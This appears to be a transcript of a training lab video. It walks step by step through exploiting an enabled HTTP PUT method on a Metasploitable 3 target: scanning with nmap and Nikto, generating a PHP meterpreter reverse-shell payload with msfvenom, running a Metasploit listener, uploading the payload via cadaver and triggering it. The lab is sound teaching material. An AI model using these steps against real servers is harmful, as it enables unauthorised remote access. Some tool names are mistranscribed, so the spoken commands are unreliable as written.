Greetings, I'm Professor K, and in this short video presentation, we're going to take a look at how we go about exploiting the HTTP put method if it is found to be present on a web server. In this short lab, we will exploit the HTTP put method using Metasploitable 3 as our target machine. If the HTTP put method is enabled on the web server, it can be used to upload a specified resource to the target machine, such as a web shell. We will also look at determining if the HTTP put method is enabled. For this lab demonstration, I will be using one virtual install of Kali Linux, one virtual install of Metasploitable 3, and my VirtualBox adapters have all been set to host-only networking. The first thing you'll need to do for this lab is discover the IP addresses for both your Kali and for your target machine. Let's go ahead and start off with our target machine. Now we're up on the target machine. I'm going to go to Start, and from the Start menu I'm going to select Command Prompt. At the prompt I'm going to type in ipconfig. Hit Enter. And the IP address that we are interested in is the one for the local area connection. My IP address is 192.168.56.103. This is my IP address for my target. Your IP address may differ. Now let's go back on over to our Kali machine. Back over here on our Kali desktop, let's open up a terminal. And at the terminal prompt, type in ifconfig. Hit Enter. And the IP address that we want here is the IP address for our Ethernet 0 adapter. My IP address is 192.168.56.101. This is the IP address for my Ethernet 0 adapter. Your IP address may differ. Go ahead and close out your terminal, and let's open up a fresh one. Now, the next thing you want to do is check for connectivity between your Kali machine and the target. To do this, we're going to type in ping, followed by the IP address of our target. Once you have all that typed in correctly, go ahead and hit Enter, and we come back with some positive responses. Now, to break out of the sequence, just go ahead and hit Control-C on your keyboard, and you can close out that terminal. We next need to create a working folder. So anywhere on your Kali desktop, just right-click, and from the context menu, you're going to select Create Folder. Give your folder a user-friendly name. I called my working folder Shellcodes, but you are free to call your working folder as you see fit. Once you have that username typed in, go ahead and hit the Create button. And once you have that new working folder created, go ahead and right-click on it. And from the context menu, you're going to select Open Terminal here. We're now ready to begin the lab. So the first thing we need to do is to scan our target for a list of services that are running on Metasploitable 3. Now, to do this, at the prompt, I've typed in nmap. Give it a space, -sv. Give it a space, dash, small letter P, dash. That tells nmap to scan all 65,535 ports. Then I give it another space, dash, small letter N. This tells nmap, don't bother with DNS name resolution. I give it a space, type in my IP address for my target. This is the IP address for my target. Your IP address may differ. Once you have everything typed in correctly, go ahead and hit Enter. Now remember, this is going to be a long scan, can take up to about 21 minutes, so be patient and give it time to complete. If you would like to see the progress of the scan, just hit Enter. And it comes back and it tells you that about 95.35% of the scan is done. Estimated time to completion is 33 seconds. Once the scan does complete, you can see that we have a whole lot of services running on Metasploitable 3. Now, the one that we're going to take note of is the one that is running on port 8585. That's right here. And that's going to be an instance of Apache server version 2.2.21 that is running a WebDAV application. The next step is to determine what directories are present on this web server. An excellent tool that brute forces directories on a web server is derp. So let's take a look at how we're going to use derp to find the directories that are listed on this particular web server. So at my prompt, I've typed in derp, give it a space. Now I have to type in the URL and the port number that I want to use to look for directories. So at the prompt, we've got derp space http:// the IP address of my target machine, give it a colon, and we're looking for directories up inside of that Apache web server that is running on port 8585. Once you have all that typed in correctly, just go ahead and hit enter. Our derp scan completes and it comes back and it tells us some information about a WordPress application that is running on port 8585. And up inside of that WordPress application is a WP-content folder, and inside that folder we have uploads. And so uploads is the folder that we're going to be using to exploit HTTP put. Let's go ahead and clear our terminal. So we use derp to locate an interesting folder called uploads, but we don't know if it's vulnerable to the HTTP put method. And so to figure this out, we're going to be using another application called Nikto. Nikto is a web server scanner that tests web servers for dangerous files, CGIs, outdated server software, and other issues. It also performs generic and server types of specific checks. So using the following command, we can test that uploads folder to see if it is vulnerable to the HTTP put method. So at the prompt, I've typed in Nikto, give it a space, -host. Give it a space. Now again, I have to type in the URL for my target, followed by a colon, and then the port 8585, give it a /, and then I give it the directory that we want to look in, and that is the uploads directory. Once I have everything typed in correctly, let's just go ahead and hit enter. And as we go through our Nikto scan results, we see that we do have an HTTP method put that allows clients to save files on that web server inside of that uploads directory. So now we're ready to proceed on with uploading our reverse shell. Go ahead and clear your terminal. We can now use MSF Venom to create our PHP payload that we're going to deliver up to the uploads folder. So at my Kali prompt, I've typed in MSF Venom, give it a space, -p, which stands for payload, give it a space, and this is the payload that we're going to create. PHP/metapredator/reverse_TCP. Give it a space. Now I have to type in the local host IP address for my Kali machine. This IP address for my Kali machine is 192.168.56.101. Your IP address will probably differ. Give it a space. Now we have to identify the listening port that Kali will be using for that reverse shell. So at the prompt, I've typed in L port equals 5555, give it a space, greater than sign, and what I'm saying here with the greater than sign is save the payload to /root/desktop/shellcodes and name that payload payload.php. Once you have everything typed in correctly, go ahead and hit enter. It takes a couple of seconds for MSF Venom to generate this payload, so do be patient. We next need to set up a listener to receive the incoming connection from our target machine. To do this, we're going to open up a new terminal, and at the prompt we're going to type in MSF console. Once you have everything typed in correctly, go ahead and hit enter. We first need to tell Metasploit the exploit that it needs to use. So at the prompt, I've typed in use space exploit /multi/handler. Once you have everything typed in correctly, go ahead and hit enter. We next need to set the correct payload for Metasploit to use. So at the prompt, I've typed in set space payload space PHP/metapredator/reverse_TCP. When you have all that typed in correctly, just go ahead and hit enter. I next have to set the localhost IP address, which is the IP address of my Kali machine. So at the prompt, I've typed in set space lhost space the IP address of my Kali machine. Once you have all that typed in correctly, go ahead and hit enter. We next need to set the listening port that Kali needs to be using to receive the reverse shell connection. So at the prompt, I've typed in set space L port space 5555. Once we have everything typed in correctly, go ahead and hit enter. We're now ready to set up Kali as a listener. Now to do this, at my Metasploit prompt, I'm going to type in exploit. Once I have all that typed in correctly, I hit enter. And now Kali is listening for a reverse shell on port 5555. Let's go ahead and bring back up a terminal, the one that was working inside of our working folder. We're now ready to copy our payload on up to that uploads folder, which is going to be accessible to the HTTP put method. Now to do this, I'm going to use cadaver. So I've typed in cadaver, give it a space. Now I'm going to type in the URL of my target machine, followed by a colon and the port number that the service is running on, and /, and then the folder that I want to drop this payload into, which is uploads. Once I have everything correctly typed in, I'm going to go ahead and hit enter. And now it brings me back to a prompt letting me know that I am actually inside of the uploads folder. Now this is where we can use the put command to drop that payload into the uploads folder. So I'm going to type in put, give it a space, the name of the payload. Now once you have everything typed in correctly, go ahead and hit enter, and it immediately copies up the payload to that uploads folder on our target machine. You can close out this terminal, but leave your listener open. From your Kali machine, go ahead and open up a browser. And in your address bar of your browser, you're going to type in the IP address of your target, colon, the port number that the service is running on, give it a / uploads. That's the directory that we need to get into so that we can launch the payload. Now to launch the payload, all you have to do is just double click it. And now if we bring back up our listener, you're going to see that you got a Metapredator prompt. And that's going to give you access to the machine as a user you are currently logged on as. So in this short lab, we exploited HTTP put method and uploaded a PHP reverse shell payload directly to a web server. We learned how to use cadaver to upload the payload, and we also learned how to check the HTTP methods present on the website using Nikto. I'm Professor K. Thanks for watching, and I'll see you in my next video.